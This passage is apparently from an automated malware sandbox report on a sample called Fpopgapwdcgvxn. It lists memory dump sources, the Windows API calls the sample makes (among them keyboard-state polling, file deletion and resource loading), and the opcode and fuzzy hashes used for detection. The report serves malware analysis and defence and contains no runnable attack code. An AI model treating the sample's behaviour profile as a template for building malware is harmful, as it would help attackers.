                                                                                                    • API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2995439034-0
                                                                                                    • Opcode ID: 86d927cc1de3d8bb568bb73cda66fc6eb496eca0e1d19aebb0843c73381325ce
                                                                                                    • Instruction ID: 6b7a9269ff9507a136d4addcde37a5e1645469a7a2d1aa577fba3a903671ecfd
                                                                                                    • Opcode Fuzzy Hash: 86d927cc1de3d8bb568bb73cda66fc6eb496eca0e1d19aebb0843c73381325ce
                                                                                                    • Instruction Fuzzy Hash: 8C11EC78A143009BDB64EF6DCDD5F5A77A9AF48300F4800A4BA44DF2EBD6B5D8848710
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: MonitorFromWindow
                                                                                                    • API String ID: 190572456-2842599566
                                                                                                    • Opcode ID: b466ba013e58d7e7673febb9a2bf04fffd72dadd165d848c64560a1e57b1e442
                                                                                                    • Instruction ID: 1f531d2152086c27c41ccf3286020a83d8b5e4741b8ed6b85875a28d76f5430c
                                                                                                    • Opcode Fuzzy Hash: b466ba013e58d7e7673febb9a2bf04fffd72dadd165d848c64560a1e57b1e442
                                                                                                    • Instruction Fuzzy Hash: 590169A69282196F9704EA589C80EFFB36CEF05350F448492E8159F241EB669AC187F5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 032CA293
                                                                                                    • LoadResource.KERNEL32(?,032CA318,?,?,?,032C5D70,?,00000001,00000000,?,032CA1BE,00000000,?), ref: 032CA2AD
                                                                                                    • SizeofResource.KERNEL32(?,032CA318,?,032CA318,?,?,?,032C5D70,?,00000001,00000000,?,032CA1BE,00000000,?), ref: 032CA2C7
                                                                                                    • LockResource.KERNEL32(032C9E88,00000000,?,032CA318,?,032CA318,?,?,?,032C5D70,?,00000001,00000000,?,032CA1BE,00000000), ref: 032CA2D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                    • Instruction ID: be3d3c06a48dcfaedcb8e51e503eb8c20518ce5c5df8618937508ff7343b9082
                                                                                                    • Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                    • Instruction Fuzzy Hash: D2F081776243186F9B49EFACA880D9B73FCEE892A0314415AF90CCB205DAB1DD518374
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 032B5228: SysAllocStringLen.OLEAUT32(?,?), ref: 032B5236
• RtlInitUnicodeString.N(?,?,00000000,0330B68E), ref: 0330B63C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0330B68E), ref: 0330B652
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0330B68E), ref: 0330B671
  • Part of subcall function 032B4F68: SysFreeString.OLEAUT32(0330C964), ref: 032B4F76
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
• String ID:
• API String ID: 1694942484-0
• Opcode ID: e01e8e04a1ae4483de27e8bd9fc2ab1798da633e52087e19ba1f821be15667ca
• Instruction ID: 46fc0172908afeac09ea637d0541c84822b4aa892cdeacc4378f5510ee73c55b
• Opcode Fuzzy Hash: e01e8e04a1ae4483de27e8bd9fc2ab1798da633e52087e19ba1f821be15667ca
• Instruction Fuzzy Hash: 5B01EC7995430CAEDB11EBE0CD92FDDB3BCEB48700F6145A1E610EA5C0EA75EB048A64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 03302480
• GetCursorPos.USER32(?), ref: 0330249D
• WaitForSingleObject.KERNEL32(00000000,00000064), ref: 033024BD
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CurrentCursorObjectSingleThreadWait
• String ID:
• API String ID: 1359611202-0
• Opcode ID: d6d991904ec1302a3a317107c021cd63ee1da723189c530803014263fc98ad4e
• Instruction ID: 74b76778564fc953c57cde4bde745ba8853c4b29e88ca81d3a3cd89d82a7112d
• Opcode Fuzzy Hash: d6d991904ec1302a3a317107c021cd63ee1da723189c530803014263fc98ad4e
• Instruction Fuzzy Hash: CEF082365143089BDB15EB68DCC9B9AB3ECEB04310F844566E511CB1D1EBB994C4CB55
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMessagePos.USER32 ref: 032EF167
• GetKeyboardState.USER32(?,?,?,?,032EF6DC), ref: 032EF264
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: KeyboardMessageState
• String ID:
• API String ID: 3083355189-0
• Opcode ID: e422702caf63331ba9801abbfeadb1726b5f989aa6d7427f36ea3727b841d44c
• Instruction ID: 964aee0b40e6a2bd8d576fe86b7db01bb8ba00eb86ee579b9413cc34252c045e
• Opcode Fuzzy Hash: e422702caf63331ba9801abbfeadb1726b5f989aa6d7427f36ea3727b841d44c
• Instruction Fuzzy Hash: 8A31A139528345ABC724DF7CC6467DABBD5AF89310F814A2AE598C7240E7B4C9808797
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CaptureIconic
• String ID:
• API String ID: 2277910766-0
• Opcode ID: ccff090c3a6bc913213355451a673064edae4c15c66439a31df86c8429d188b2
• Instruction ID: 8da1c94e201b81350ac6aae58cae4d7e65fcb439ab12125c9b42a2b578af5172
• Opcode Fuzzy Hash: ccff090c3a6bc913213355451a673064edae4c15c66439a31df86c8429d188b2
• Instruction Fuzzy Hash: 28113031B20646DFDB24DB59D9C49AAF3F8AF44304B6840B8EA05CB391DB72FD949750
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,032D350C), ref: 032D3490
• FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,032D350C), ref: 032D34B6
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 958f3aaf5dfab6c35ce7059d8ed97841093a8e29481b0db5b36a976decc7ab63
• Instruction ID: c0a1925e12c7bec6a3a272faaa3ea048e4b8ddeab9755ee7518a27301fc2cc44
• Opcode Fuzzy Hash: 958f3aaf5dfab6c35ce7059d8ed97841093a8e29481b0db5b36a976decc7ab63
• Instruction Fuzzy Hash: 950184782247055FE722EA61CC91BDA73F8AB18740F5540B0EB44EA581DAF5A9C08911
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 032B8F79
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
• Instruction ID: 03ece18e986b3718e410acc8140736d896bf85ef758d3fd9cfede3ad0369a0d4
• Opcode Fuzzy Hash: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
• Instruction Fuzzy Hash: 2A110CB5E00209AFDB04CF99C8809EFB7F9EFC8310B54C569A408EB250E6719A41CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032BB8E2
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
• Instruction ID: fb55fef48de33a9a4320ef50af52cf48cc7b674d6b253081db17ab38cde08575
• Opcode Fuzzy Hash: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
• Instruction Fuzzy Hash: EEE0D87572031817D711E5699CC4EF6727C9758390F00026AB948CB385EEF0DDC047E4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,032BD07E,00000000,032BD297,?,?,00000000,00000000), ref: 032BB923
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
• Instruction ID: 6e8ea2a96e988f3eb9f9a2bcd3a78a9cbf89c9b11d3046c3314138d5dd64d609
• Opcode Fuzzy Hash: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
• Instruction Fuzzy Hash: 54D05E6632E6602AE210D15A2D84DBB5EFCCAC57E1F04803AB5C8CB201D2408C469A71
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
• Opcode ID: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
• Instruction ID: 9f3af1c34245ff6774e36167bc319abc4a07605649a93d34884f9d2a8db5486a
• Opcode Fuzzy Hash: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
• Instruction Fuzzy Hash: 16A0120440482001C54073184C0217434E05800720FC4074068F8542D0E91D01608093
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000003.2144868732.0000000002670000.00000004.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2670000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 761e8e647f0b018d5f1533b0d1d12f478d97fb487833b795481caaed8f7852ce
• Instruction ID: 89c8c403be08aa7bbb6c0c213c9afd0136f7a3f46bfd197c1ab2bf07cc34b50b
• Opcode Fuzzy Hash: 761e8e647f0b018d5f1533b0d1d12f478d97fb487833b795481caaed8f7852ce
• Instruction Fuzzy Hash: D1A1857644E7C29FD313DB389895796BFA0FE43224B184ADEC8C14F593C751985ACB82
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bbf546447c09ed1e4715b53e42467d0f5adf3a50d4ed8dbf32eb914c8c674a1b
• Instruction ID: 5728a914eb6a84b98c463ce2c624eadcfe93d163c615b38551a1ffe3c21831ef
• Opcode Fuzzy Hash: bbf546447c09ed1e4715b53e42467d0f5adf3a50d4ed8dbf32eb914c8c674a1b
• Instruction Fuzzy Hash: F251D37140E3E09FCB4397788CA42967FB0AE1B35471E24D7C8C0CF1A7D615696AEB22
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
• Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(uxtheme.dll,00000000,032DBB0F), ref: 032DB792
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 032DB7AA
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 032DB7BC
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 032DB7CE
• GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 032DB7E0
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 032DB7F2
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 032DB804
• GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 032DB816
• GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 032DB828
• GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 032DB83A
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 032DB84C
• GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 032DB85E
• GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 032DB870
• GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 032DB882
• GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 032DB894
• GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 032DB8A6
• GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 032DB8B8
• GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 032DB8CA
• GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 032DB8DC
• GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 032DB8EE
• GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 032DB900
• GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 032DB912
• GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 032DB924
• GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 032DB936
• GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 032DB948
• GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 032DB95A
• GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 032DB96C
• GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 032DB97E
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 032DB990
• GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 032DB9A2
• GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 032DB9B4
• GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 032DB9C6
• GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 032DB9D8
• GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 032DB9EA
• GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 032DB9FC
• GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 032DBA0E
• GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 032DBA20
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 032DBA32
• GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 032DBA44
• GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 032DBA56
• GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 032DBA68
• GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 032DBA7A
• GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 032DBA8C
• GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 032DBA9E
• GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 032DBAB0
• GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 032DBAC2
• GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 032DBAD4
• GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 032DBAE6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
• API String ID: 2238633743-2910565190
• Opcode ID: b082643431e5ef6c80476ed0c7471cc46c533b115d14c966de3957dc0826fd11
• Instruction ID: 969761f889262025fb000d3966017a98a3f05a58002e2d5eac917875e11ef48f
• Opcode Fuzzy Hash: b082643431e5ef6c80476ed0c7471cc46c533b115d14c966de3957dc0826fd11
• Instruction Fuzzy Hash: CFA156B5A64750AFEF08FFB4D8E2DA937BCEB09740F014565B425DF60ADAB49880CB10
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 032BE609
  • Part of subcall function 032BE5D4: GetProcAddress.KERNEL32(00000000), ref: 032BE5ED
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
• Opcode ID: 34d1ddb9487ca6aefcf59378ab461b3c1768de4805f5e19b2ef554f23b44db18
• Instruction ID: dec64d98315fb4374a42c847950b029f99c35898e5cd793a5490d54408e8cbfe
• Opcode Fuzzy Hash: 34d1ddb9487ca6aefcf59378ab461b3c1768de4805f5e19b2ef554f23b44db18
• Instruction Fuzzy Hash: 84410C6463C30C5BE208FA6974408EA77FCD644790B67C02AF405CAB58EF70BDC1876A
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 032D370B
• SelectObject.GDI32(?,?), ref: 032D3720
• MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,032D3790,?,?), ref: 032D3764
• SelectObject.GDI32(?,?), ref: 032D377E
• DeleteObject.GDI32(?), ref: 032D378A
• CreateCompatibleDC.GDI32(00000000), ref: 032D379E
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 032D37BF
• SelectObject.GDI32(?,?), ref: 032D37D4
• SelectPalette.GDI32(?,8A080D4D,00000000), ref: 032D37E8
• SelectPalette.GDI32(?,?,00000000), ref: 032D37FA
• SelectPalette.GDI32(?,00000000,000000FF), ref: 032D380F
• SelectPalette.GDI32(?,8A080D4D,000000FF), ref: 032D3825
• RealizePalette.GDI32(?), ref: 032D3831
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 032D3853
• StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 032D3875
• SetTextColor.GDI32(?,00000000), ref: 032D387D
• SetBkColor.GDI32(?,00FFFFFF), ref: 032D388B
• StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 032D38B7
• StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 032D38DC
• SetTextColor.GDI32(?,?), ref: 032D38E6
• SetBkColor.GDI32(?,?), ref: 032D38F0
• SelectObject.GDI32(?,00000000), ref: 032D3903
• DeleteObject.GDI32(?), ref: 032D390C
• SelectPalette.GDI32(?,00000000,00000000), ref: 032D392E
• DeleteDC.GDI32(?), ref: 032D3937
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
• String ID:
• API String ID: 3976802218-0
• Opcode ID: f4490c4455fc86460affe4763126b16bbefe1f853115cb61371efa2a7740e8e3
• Instruction ID: b01c5dda7c0f770a8f614c1eef34096bf8367481f9a11a90628a532f067fd758
• Opcode Fuzzy Hash: f4490c4455fc86460affe4763126b16bbefe1f853115cb61371efa2a7740e8e3
• Instruction Fuzzy Hash: 28817DB6A10209AFDB50EFA8CD84EEFBBFCAB0D750F154554F618EB240C675AD408B61
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetObjectA.GDI32(?,00000054,?), ref: 032D567F
• GetDC.USER32(00000000), ref: 032D56AD
• CreateCompatibleDC.GDI32(?), ref: 032D56BE
• CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 032D56D9
• SelectObject.GDI32(?,00000000), ref: 032D56F3
• PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 032D5715
• CreateCompatibleDC.GDI32(?), ref: 032D5723
• SelectObject.GDI32(?), ref: 032D576B
• SelectPalette.GDI32(?,?,00000000), ref: 032D577E
• RealizePalette.GDI32(?), ref: 032D5787
• SelectPalette.GDI32(?,?,00000000), ref: 032D5793
• RealizePalette.GDI32(?), ref: 032D579C
• SetBkColor.GDI32(?), ref: 032D57A6
• BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 032D57CA
• SetBkColor.GDI32(?,00000000), ref: 032D57D4
• SelectObject.GDI32(?,00000000), ref: 032D57E7
